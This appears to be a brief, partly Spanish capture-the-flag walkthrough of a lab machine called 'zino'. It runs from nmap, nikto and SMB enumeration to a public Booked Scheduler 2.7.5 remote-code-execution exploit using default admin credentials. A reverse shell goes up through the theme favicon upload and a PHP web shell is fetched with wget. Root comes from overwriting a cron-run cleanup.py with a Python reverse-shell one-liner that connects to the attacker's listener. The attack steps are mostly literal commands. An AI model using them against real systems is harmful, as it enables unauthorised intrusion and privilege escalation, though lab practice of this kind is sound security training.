nmap -A -p- -oA zino 192.168.139.64 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA zino 192.168.139.64

nmap -sU -O -p- -oA zino-udp 192.168.139.64

nikto -h 192.168.139.64:80

Pasted image 20211001073025.png

Pasted image 20211001073531.png

smbclient \\\\192.168.139.64\\zino

Pasted image 20211001073452.png

cat misc.log

cat auth.log

Pasted image 20211001073641.png

https://github.com/F-Masood/Booked-Scheduler-2.7.5---RCE-Without-MSF

Credenciales admin:adminadmin

Pasted image 20211001120638.png

http://192.168.xx.xx/Web/admin/manage_theme.php

Subimos el archivo con el reverse shell en el campo del medio, donde dice favicon.ico

Pasted image 20211005164624.png

https://github.com/artyuum/Simple-PHP-Web-Shell

python3 -m http.server 80

wget http://192.168.49.123:21/shell.php

Pasted image 20211005170443.png

Ejecutamos lo siguiente:

php shell.php

nc -lvnp 21

python3 -m http.server 21

Pasted image 20211006145843.png

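En la salida de linpeas.sh vemos el archivo cleanup.py en /var/www/html/booked. Al parecer lo ejecuta periódicamente una tarea programada con más privilegios y el usuario del servidor web puede modificarlo (por confirmar con la salida de linpeas); la corrección es que un script ejecutado por una tarea privilegiada no sea escribible por la cuenta del servidor web.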

Pasted image 20211006150323.png

cd /var/www/html/booked

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.123",21));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > cleanup.py

nc -lvnp 21

Pasted image 20211006151437.png
